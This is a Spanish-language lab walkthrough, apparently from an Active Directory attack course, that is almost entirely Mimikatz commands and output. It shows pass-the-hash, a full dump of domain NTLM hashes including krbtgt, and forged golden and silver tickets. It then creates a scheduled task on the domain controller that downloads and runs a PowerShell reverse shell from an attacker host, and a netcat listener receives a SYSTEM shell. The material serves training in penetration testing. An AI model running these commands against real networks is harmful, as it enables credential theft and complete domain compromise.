Learning Objective - 8 y 9
Golden ticket
Creamos una sesion utilizando el DA desde cualquier computador utilizando Mimikatz.
PS C:\AD\Tools> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:af0686cc0ca8f04df42210c9ac980760
user : Administrator
domain : dollarcorp.moneycorp.local
program : cmd.exe
impers. : no
NTLM : af0686cc0ca8f04df42210c9ac980760
| PID 5128
| TID 4660
| LSA Process is now R/W
| LUID 0 ; 41699318 (00000000:027c47f6)
\_ msv1_0 - data copy @ 00000216750E60F0 : OK !
\_ kerberos - data copy @ 00000216753FB7C8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 0000021675AEF428 (32) -> null
mimikatz #Luego en la consola generada, importamos el Invoke Mimikatz y realizamos la obtencion de los hashes del usuario krbgt.
PS C:\AD\Tools> . .\Invoke-Mimikatz.ps1
PS C:\AD\Tools> Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::lsa /patch
Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 4e9815869d2090ccfca61c1fe0d23986
RID : 00000459 (1113)
User : sqladmin
LM :
NTLM : 07e8be316e3da9a042a9cb681df19bf5
RID : 0000045a (1114)
User : websvc
LM :
NTLM : cc098f204c5887eaa8253e7c2749156f
RID : 0000045b (1115)
User : srvadmin
LM :
NTLM : a98e18228819e8eec3dfa33cb68b0728
RID : 0000045d (1117)
User : appadmin
LM :
NTLM : d549831a955fee51a43c83efb3928fa7
RID : 0000045e (1118)
User : svcadmin
LM :
NTLM : b38ff50264b74508085d82c69794a4d8
RID : 0000045f (1119)
User : testda
LM :
NTLM : a16452f790729fa34e8f3a08f234a82c
RID : 00000460 (1120)
User : mgmtadmin
LM :
NTLM : 95e2cd7ff77379e34c6e46265e75d754
RID : 00000461 (1121)
User : ciadmin
LM :
NTLM : e08253add90dccf1a208523d02998c3d
RID : 00000462 (1122)
User : sql1admin
LM :
NTLM : e999ae4bd06932620a1e78d2112138c6
RID : 00001055 (4181)
User : studentadmin
LM :
NTLM : d1254f303421d3cdbdc4c73a5bce0201
RID : 00003521 (13601)
User : student721
LM :
NTLM : c72c376699f31f096b2d5ab64cbdcd94
RID : 00003522 (13602)
User : student722
LM :
NTLM : d24ea4c7d485b9db9033c58cf221c900
RID : 00003523 (13603)
User : student723
LM :
NTLM : e602f8c5d4a53971a58774eb4db1bdf0
RID : 00003524 (13604)
User : student724
LM :
NTLM : 910d4b954db17832138473b090abb337
RID : 00003525 (13605)
User : student725
LM :
NTLM : ddaeb719bb3ebaf44f273cf302965f5a
RID : 00003526 (13606)
User : student726
LM :
NTLM : 12a836992d9a17bc71aafe08c58a2657
RID : 00003527 (13607)
User : student727
LM :
NTLM : d99bd8f6b5a4522f5ca082969f1479c4
RID : 00003528 (13608)
User : student728
LM :
NTLM : 9d50c933c86d072edb0815f82e6a5baf
RID : 00003529 (13609)
User : student729
LM :
NTLM : e1a081574f45f39d561e9dda3a918a14
RID : 0000352a (13610)
User : student730
LM :
NTLM : 9af9ad18e24b91eb4a0116ec8df5a27f
RID : 0000352b (13611)
User : student731
LM :
NTLM : 1f1c0cf05907d2bd7e863a7fe55c45b0
RID : 0000352c (13612)
User : student732
LM :
NTLM : c2ddcf1a32f71dce214be2cca9c04993
RID : 0000352d (13613)
User : student733
LM :
NTLM : e559ae80aaf6bcdc856b5df589f9d695
RID : 0000352e (13614)
User : student734
LM :
NTLM : b166b8e2d5dc7127002837197b3d24f4
RID : 0000352f (13615)
User : student735
LM :
NTLM : 2c289e4aee543d3ce0b4d65eb5518ad2
RID : 00003530 (13616)
User : student736
LM :
NTLM : 99af9ba03d340bdb9ea572cbf0b58406
RID : 00003531 (13617)
User : student737
LM :
NTLM : f3f3922ead678ca56a8319ef7adb6bff
RID : 00003532 (13618)
User : student738
LM :
NTLM : 9b8e48d74a130fc0d1865405cf2aaba6
RID : 00003533 (13619)
User : student739
LM :
NTLM : a39339b2e182046b60232f0478d6a0a4
RID : 00003534 (13620)
User : student740
LM :
NTLM : 483e63bc5ecb5d9026f689946eaaf87c
RID : 00003535 (13621)
User : Control721user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003536 (13622)
User : Control722user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003537 (13623)
User : Control723user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003538 (13624)
User : Control724user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003539 (13625)
User : Control725user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000353a (13626)
User : Control726user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000353b (13627)
User : Control727user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000353c (13628)
User : Control728user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000353d (13629)
User : Control729user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000353e (13630)
User : Control730user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000353f (13631)
User : Control731user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003540 (13632)
User : Control732user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003541 (13633)
User : Control733user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003542 (13634)
User : Control734user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003543 (13635)
User : Control735user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003544 (13636)
User : Control736user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003545 (13637)
User : Control737user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003546 (13638)
User : Control738user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003547 (13639)
User : Control739user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003548 (13640)
User : Control740user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 00003549 (13641)
User : Support721user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000354a (13642)
User : Support722user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000354b (13643)
User : Support723user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000354c (13644)
User : Support724user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000354d (13645)
User : Support725user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000354e (13646)
User : Support726user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000354f (13647)
User : Support727user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003550 (13648)
User : Support728user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003551 (13649)
User : Support729user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003552 (13650)
User : Support730user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003553 (13651)
User : Support731user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003554 (13652)
User : Support732user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003555 (13653)
User : Support733user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003556 (13654)
User : Support734user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003557 (13655)
User : Support735user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003558 (13656)
User : Support736user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003559 (13657)
User : Support737user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000355a (13658)
User : Support738user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000355b (13659)
User : Support739user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000355c (13660)
User : Support740user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000355d (13661)
User : VPN721user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000355e (13662)
User : VPN722user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000355f (13663)
User : VPN723user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003560 (13664)
User : VPN724user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003561 (13665)
User : VPN725user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003562 (13666)
User : VPN726user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003563 (13667)
User : VPN727user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003564 (13668)
User : VPN728user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003565 (13669)
User : VPN729user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003566 (13670)
User : VPN730user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003567 (13671)
User : VPN731user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003568 (13672)
User : VPN732user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003569 (13673)
User : VPN733user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000356a (13674)
User : VPN734user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000356b (13675)
User : VPN735user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000356c (13676)
User : VPN736user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000356d (13677)
User : VPN737user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000356e (13678)
User : VPN738user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000356f (13679)
User : VPN739user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 00003570 (13680)
User : VPN740user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 000003e8 (1000)
User : DCORP-DC$
LM :
NTLM : ef7a661f7edb7f5a1be191640342d6b7
RID : 00000451 (1105)
User : DCORP-ADMINSRV$
LM :
NTLM : b5f451985fd34d58d5120816d31b5565
RID : 00000452 (1106)
User : DCORP-APPSRV$
LM :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5
RID : 00000453 (1107)
User : DCORP-CI$
LM :
NTLM : f76f48c176dc09cfd5765843c32809f3
RID : 00000454 (1108)
User : DCORP-MGMT$
LM :
NTLM : 0878da540f45b31b974f73312c18e754
RID : 00000455 (1109)
User : DCORP-MSSQL$
LM :
NTLM : b205f1ca05bedace801893d6aa5aca27
RID : 00000456 (1110)
User : DCORP-SQL1$
LM :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49
RID : 0000106a (4202)
User : DCORP-STDADMIN$
LM :
NTLM : e444bbf444732fc38065ea9e9255ab03
RID : 00003571 (13681)
User : DCORP-STD721$
LM :
NTLM : b9fed91f5f32818fae2271b05f189926
RID : 00003572 (13682)
User : DCORP-STD722$
LM :
NTLM : 2b04543bc07afe3966ff85e06f0a9412
RID : 00003573 (13683)
User : DCORP-STD724$
LM :
NTLM : e80b06a0063459999d702dc654312ea5
RID : 00003574 (13684)
User : DCORP-STD723$
LM :
NTLM : efd9824a276d26fcc5fc2ca14273225c
RID : 00003575 (13685)
User : DCORP-STD726$
LM :
NTLM : 05df9f9bc89dd594c5884e20ce1c683b
RID : 00003576 (13686)
User : DCORP-STD729$
LM :
NTLM : 03a26f64fd32b458ca55614c41bc5d80
RID : 00003577 (13687)
User : DCORP-STD725$
LM :
NTLM : 0783061c7d97c91b32b6f0c9b2a66c05
RID : 00003578 (13688)
User : DCORP-STD728$
LM :
NTLM : 43949d8590e999a5ca4b0eb369c6c620
RID : 00003579 (13689)
User : DCORP-STD727$
LM :
NTLM : a19a6642a51ee86db03d722bb2ae7930
RID : 0000357a (13690)
User : DCORP-STD731$
LM :
NTLM : e09c18c5b34fb9db4b4bd4e2bdc24c06
RID : 0000357b (13691)
User : DCORP-STD732$
LM :
NTLM : fcbf3df06ea9f5a0c0e9d9117bdb9d16
RID : 0000357c (13692)
User : DCORP-STD730$
LM :
NTLM : 3befa14afd532cc6faba9f0f9abb3128
RID : 0000357d (13693)
User : DCORP-STD733$
LM :
NTLM : e6fb50826836c584764b2e8275bedd9b
RID : 0000357e (13694)
User : DCORP-STD735$
LM :
NTLM : 8e5d039b8050c4e6d808ba7b904a107f
RID : 0000357f (13695)
User : DCORP-STD734$
LM :
NTLM : a68fa0eb1fa1d3da3a1e43f0e89049a3
RID : 00003580 (13696)
User : DCORP-STD736$
LM :
NTLM : 0267e3942c7d30950dba326f224f1882
RID : 00003581 (13697)
User : DCORP-STD737$
LM :
NTLM : 845002eccf7afd8343e818d2794d6556
RID : 00003582 (13698)
User : DCORP-STD739$
LM :
NTLM : 3070e58dbca650744068b1e120fefddc
RID : 00003583 (13699)
User : DCORP-STD740$
LM :
NTLM : b7bb22710be9d4a91bc42e7796ecd458
RID : 00003584 (13700)
User : DCORP-STD738$
LM :
NTLM : 6dc73ad2690d87a76bbd4a0ded74808d
RID : 0000044f (1103)
User : mcorp$
LM :
NTLM : f5b5c9f1ca76187393db1d3bb8ded94e
RID : 00000450 (1104)
User : US$
LM :
NTLM : f85385d81cc4936d37ff8f27813f43c6
RID : 00000458 (1112)
User : ecorp$
LM :
NTLM : 4501e4c7f30e1cb3c9886f06a3ed1c6aCreando el golden ticket:
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4e9815869d2090ccfca61c1fe0d23986 /startoffset:0 /endin:600 /renewmax:10080 /ticket" "exit"'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4e9815869d2090ccfca61c1fe0d23986 /startoffset:0 /endin:600 /renewmax:10080 /ticket
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4e9815869d2090ccfca61c1fe0d23986 - rc4_hmac_nt
Lifetime : 2/24/2024 1:13:24 AM ; 2/24/2024 11:13:24 AM ; 3/2/2024 1:13:24 AM
-> Ticket : ticket.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz(powershell) # exit
Bye!
PS C:\AD\Tools\tickets> ls
Directory: C:\AD\Tools\tickets
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/24/2024 1:13 AM 1489 ticket.kirbi
Silver Ticket
Ejecutamos el comando para crear el silver ticket
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:ef7a661f7edb7f5a1be191640342d6b7 /startoffset:0 /endin:600 /renewmax:10080 /ticket" "exit"'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:ef7a661f7edb7f5a1be191640342d6b7 /startoffset:0 /endin:600 /renewmax:10080 /ticket
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: ef7a661f7edb7f5a1be191640342d6b7 - rc4_hmac_nt
Service : HOST
Target : dcorp-dc.dollarcorp.moneycorp.local
Lifetime : 2/25/2024 2:22:44 PM ; 2/26/2024 12:22:44 AM ; 3/3/2024 2:22:44 PM
-> Ticket : ticket.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz(powershell) # exit
Bye!
PS C:\AD\Tools\tickets> ls
Directory: C:\AD\Tools\tickets
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/24/2024 1:13 AM 1489 golden-ticket.kirbi
-a---- 2/25/2024 2:22 PM 1503 ticket.kirbi
Importando ticket mimikatz
PS C:\AD\Tools\tickets> klist
Current LogonId is 0:0x17ce62
Cached Tickets: (0)
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::ptt silver-ticket.kirbi" "exit"'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::ptt silver-ticket.kirbi
* File: 'silver-ticket.kirbi': OK
mimikatz(powershell) # exit
Bye!
PS C:\AD\Tools\tickets> klist
Current LogonId is 0:0x17ce62
Cached Tickets: (1)
#0> Client: Administrator @ dollarcorp.moneycorp.local
Server: HOST/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 2/25/2024 14:22:44 (local)
End Time: 2/26/2024 0:22:44 (local)
Renew Time: 3/3/2024 14:22:44 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
PS C:\AD\Tools\tickets>Obteniendo Reverse tcp shell creando un Schedule Task con Silver Ticket
PS C:\AD\Tools\tickets> schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Tareita" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.23/Invoke-PowerShellTcp.ps1''')'"
SUCCESS: The scheduled task "Tareita" has successfully been created.
PS C:\AD\Tools\tickets> schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Tareita"
SUCCESS: Attempted to run the scheduled task "Tareita".C:\AD\Tools\netcat-win32-1.12>nc -lvp 6969
listening on [any] 6969 ...
172.16.2.1: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.16.100.23] from (UNKNOWN) [172.16.2.1] 61506: NO_DATA
Windows PowerShell running as user DCORP-DC$ on DCORP-DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\systemLast updated